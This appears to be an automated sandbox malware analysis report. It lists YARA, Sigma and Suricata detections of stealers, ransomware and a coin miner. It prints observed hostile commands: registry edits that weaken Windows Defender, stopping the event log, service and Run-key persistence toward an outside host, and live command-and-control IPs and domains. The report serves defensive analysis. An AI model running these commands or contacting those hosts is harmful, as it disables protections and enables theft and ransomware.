00000009.00000002.2703688839.0000000002491000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000002.2547476892.0000000002D43000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2691859636.000000000047C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000024.00000002.2568546778.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000011.00000002.2723255959.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37eb98:$a1: mining.set_target 0x370e20:$a2: XMRIG_HOSTNAME 0x373748:$a3: Usage: xmrig [OPTIONS] 0x370df8:$a4: XMRIG_VERSION
0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8ae1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c9348:$s1: %s/%s (Windows NT %lu.%lu 0x3ccd80:$s3: \\.\WinRing0_ 0x375d48:$s4: pool_wallet 0x3701f0:$s5: cryptonight 0x370200:$s5: cryptonight 0x370210:$s5: cryptonight 0x370220:$s5: cryptonight 0x370238:$s5: cryptonight 0x370248:$s5: cryptonight 0x370258:$s5: cryptonight 0x370270:$s5: cryptonight 0x370280:$s5: cryptonight 0x370298:$s5: cryptonight 0x3702b0:$s5: cryptonight 0x3702c0:$s5: cryptonight 0x3702d0:$s5: cryptonight 0x3702e0:$s5: cryptonight 0x3702f8:$s5: cryptonight 0x370310:$s5: cryptonight 0x370320:$s5: cryptonight 0x370330:$s5: cryptonight
0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe PID: 7008	JoeSecurity_MSIL_Downloader_Generic	Yara detected MSIL_Downloader_Generic	Joe Security
Process Memory Space: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe PID: 7008	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: bQnXcKn6ehLDJGqEStjbnSyC.exe PID: 2076	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: eROo1ugNChgONSxoiS6DxyMi.exe PID: 1028	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: eROo1ugNChgONSxoiS6DxyMi.exe PID: 1028	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NjdbLPleIutA8FKI_S3fRztd.exe PID: 180	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: NjdbLPleIutA8FKI_S3fRztd.exe PID: 180	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4ad05:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: NoCZBiPwAcSyoDte_ne2sJt7.exe PID: 2872	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.35b6dc2.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.4ec0000.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.4ec0000.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.0.HBnXrwXMNXUElNaizB6OqLMm.exe.630000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x226f7:$pwsh: powershell 0x4ad1f8:$s1: GET %s HTTP/1 0x25b680:$s4: LdrLoadDll 0x25e5bc:$s4: LdrLoadDll 0x25e83d:$s4: LdrLoadDll 0x25f2df:$s4: LdrLoadDll 0xde0c0:$v6: start 0xded6a:$v6: start 0xe1559:$v6: start 0xe15c9:$v6: start 0xe18e6:$v6: start 0xe19c9:$v6: start 0xe1a42:$v6: start 0xe26c6:$v6: start 0xe35b7:$v6: start 0xf2860:$v6: start 0xf2877:$v6: start 0xf2893:$v6: start 0xf28ad:$v6: start 0xfbbbc:$v6: start 0xfcc79:$v6: start
8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.MSBuild.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
36.2.MSBuild.exe.400000.1.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x226f7:$pwsh: powershell 0x4ad1f8:$s1: GET %s HTTP/1 0x25b680:$s4: LdrLoadDll 0x25e5bc:$s4: LdrLoadDll 0x25e83d:$s4: LdrLoadDll 0x25f2df:$s4: LdrLoadDll 0xde0c0:$v6: start 0xded6a:$v6: start 0xe1559:$v6: start 0xe15c9:$v6: start 0xe18e6:$v6: start 0xe19c9:$v6: start 0xe1a42:$v6: start 0xe26c6:$v6: start 0xe35b7:$v6: start 0xf2860:$v6: start 0xf2877:$v6: start 0xf2893:$v6: start 0xf28ad:$v6: start 0xfbbbc:$v6: start 0xfcc79:$v6: start
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x226f7:$pwsh: powershell 0x4ad1f8:$s1: GET %s HTTP/1 0x25b680:$s4: LdrLoadDll 0x25e5bc:$s4: LdrLoadDll 0x25e83d:$s4: LdrLoadDll 0x25f2df:$s4: LdrLoadDll 0xde0c0:$v6: start 0xded6a:$v6: start 0xe1559:$v6: start 0xe15c9:$v6: start 0xe18e6:$v6: start 0xe19c9:$v6: start 0xe1a42:$v6: start 0xe26c6:$v6: start 0xe35b7:$v6: start 0xf2860:$v6: start 0xf2877:$v6: start 0xf2893:$v6: start 0xf28ad:$v6: start 0xfbbbc:$v6: start 0xfcc79:$v6: start
36.2.MSBuild.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
36.2.MSBuild.exe.400000.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x23af7:$pwsh: powershell 0x4aebf8:$s1: GET %s HTTP/1 0x25d080:$s4: LdrLoadDll 0x25ffbc:$s4: LdrLoadDll 0x26023d:$s4: LdrLoadDll 0x260cdf:$s4: LdrLoadDll 0xdfac0:$v6: start 0xe076a:$v6: start 0xe2f59:$v6: start 0xe2fc9:$v6: start 0xe32e6:$v6: start 0xe33c9:$v6: start 0xe3442:$v6: start 0xe40c6:$v6: start 0xe4fb7:$v6: start 0xf4260:$v6: start 0xf4277:$v6: start 0xf4293:$v6: start 0xf42ad:$v6: start 0xfd5bc:$v6: start 0xfe679:$v6: start
8.2.bQnXcKn6ehLDJGqEStjbnSyC.exe.3dfd620.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.3499550.2.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x212f7:$pwsh: powershell 0x4ab7f8:$s1: GET %s HTTP/1 0x259c80:$s4: LdrLoadDll 0x25cbbc:$s4: LdrLoadDll 0x25ce3d:$s4: LdrLoadDll 0x25d8df:$s4: LdrLoadDll 0xdc6c0:$v6: start 0xdd36a:$v6: start 0xdfb59:$v6: start 0xdfbc9:$v6: start 0xdfee6:$v6: start 0xdffc9:$v6: start 0xe0042:$v6: start 0xe0cc6:$v6: start 0xe1bb7:$v6: start 0xf0e60:$v6: start 0xf0e77:$v6: start 0xf0e93:$v6: start 0xf0ead:$v6: start 0xfa1bc:$v6: start 0xfb279:$v6: start
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.3499550.2.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.eROo1ugNChgONSxoiS6DxyMi.exe.35b6dc2.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.0.Dc25WcfSyV8lvRa9ThM7DR04.exe.8a0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x212f7:$pwsh: powershell 0x4ab7f8:$s1: GET %s HTTP/1 0x259c80:$s4: LdrLoadDll 0x25cbbc:$s4: LdrLoadDll 0x25ce3d:$s4: LdrLoadDll 0x25d8df:$s4: LdrLoadDll 0xdc6c0:$v6: start 0xdd36a:$v6: start 0xdfb59:$v6: start 0xdfbc9:$v6: start 0xdfee6:$v6: start 0xdffc9:$v6: start 0xe0042:$v6: start 0xe0cc6:$v6: start 0xe1bb7:$v6: start 0xf0e60:$v6: start 0xf0e77:$v6: start 0xf0e93:$v6: start 0xf0ead:$v6: start 0xfa1bc:$v6: start 0xfb279:$v6: start
46.3.etzpikspwykg.exe.9f0000.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
46.3.etzpikspwykg.exe.9f0000.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37eb98:$a1: mining.set_target 0x370e20:$a2: XMRIG_HOSTNAME 0x373748:$a3: Usage: xmrig [OPTIONS] 0x370df8:$a4: XMRIG_VERSION
46.3.etzpikspwykg.exe.9f0000.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8ae1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
46.3.etzpikspwykg.exe.9f0000.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c9348:$s1: %s/%s (Windows NT %lu.%lu 0x3ccd80:$s3: \\.\WinRing0_ 0x375d48:$s4: pool_wallet 0x3701f0:$s5: cryptonight 0x370200:$s5: cryptonight 0x370210:$s5: cryptonight 0x370220:$s5: cryptonight 0x370238:$s5: cryptonight 0x370248:$s5: cryptonight 0x370258:$s5: cryptonight 0x370270:$s5: cryptonight 0x370280:$s5: cryptonight 0x370298:$s5: cryptonight 0x3702b0:$s5: cryptonight 0x3702c0:$s5: cryptonight 0x3702d0:$s5: cryptonight 0x3702e0:$s5: cryptonight 0x3702f8:$s5: cryptonight 0x370310:$s5: cryptonight 0x370320:$s5: cryptonight 0x370330:$s5: cryptonight
46.3.etzpikspwykg.exe.9f0000.2.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
46.3.etzpikspwykg.exe.9f0000.2.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37db98:$a1: mining.set_target 0x36fe20:$a2: XMRIG_HOSTNAME 0x372748:$a3: Usage: xmrig [OPTIONS] 0x36fdf8:$a4: XMRIG_VERSION
46.3.etzpikspwykg.exe.9f0000.2.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c7ae1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
46.3.etzpikspwykg.exe.9f0000.2.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c8348:$s1: %s/%s (Windows NT %lu.%lu 0x3cbd80:$s3: \\.\WinRing0_ 0x374d48:$s4: pool_wallet 0x36f1f0:$s5: cryptonight 0x36f200:$s5: cryptonight 0x36f210:$s5: cryptonight 0x36f220:$s5: cryptonight 0x36f238:$s5: cryptonight 0x36f248:$s5: cryptonight 0x36f258:$s5: cryptonight 0x36f270:$s5: cryptonight 0x36f280:$s5: cryptonight 0x36f298:$s5: cryptonight 0x36f2b0:$s5: cryptonight 0x36f2c0:$s5: cryptonight 0x36f2d0:$s5: cryptonight 0x36f2e0:$s5: cryptonight 0x36f2f8:$s5: cryptonight 0x36f310:$s5: cryptonight 0x36f320:$s5: cryptonight 0x36f330:$s5: cryptonight
Click to see the 34 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentImage: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentProcessId: 5228, ParentProcessName: mbnxbv_uftcj649iS9ilHBrA.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6016, ProcessName: powercfg.exe

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 147.45.47.59, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1456, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49757

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: .\Install.exe /qiFwdidsyGaM "525403" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe, ParentProcessId: 4916, ParentProcessName: Install.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C po

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, ProcessId: 7008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\NetVoyager\nv.exe" -run -s agent-runner-service2.com:5000, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe, ProcessId: 2596, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NetVoyager

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentImage: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentProcessId: 5228, ParentProcessName: mbnxbv_uftcj649iS9ilHBrA.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto", ProcessId: 1716, ProcessName: sc.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, ProcessId: 6336, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentImage: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe, ParentProcessId: 5228, ParentProcessName: mbnxbv_uftcj649iS9ilHBrA.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7084, ProcessName: sc.exe

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:18.201200+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:00.116047+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE PrivateLoader CnC Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 147.45.47.169

Timestamp:	2024-08-10T16:12:14.209789+0200
SID:	2054709
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (celebratioopz .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.47.141

Timestamp:	2024-08-10T16:12:45.724728+0200
SID:	2054965
Severity:	1
Source Port:	49759
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Observed Lumma Stealer Related Domain (mennyudosirso .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.73.43

Timestamp:	2024-08-10T16:12:49.742237+0200
SID:	2054957
Severity:	1
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:52.444946+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO COINMINER XMR CoinMiner Usage - Source IP: 192.168.2.4 - Destination IP: 95.179.241.203

Timestamp:	2024-08-10T16:12:15.703309+0200
SID:	2826930
Severity:	2
Source Port:	49775
Destination Port:	443
Protocol:	TCP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:08.669585+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.69.39

Timestamp:	2024-08-10T16:12:47.989074+0200
SID:	2054653
Severity:	1
Source Port:	49764
Destination Port:	443
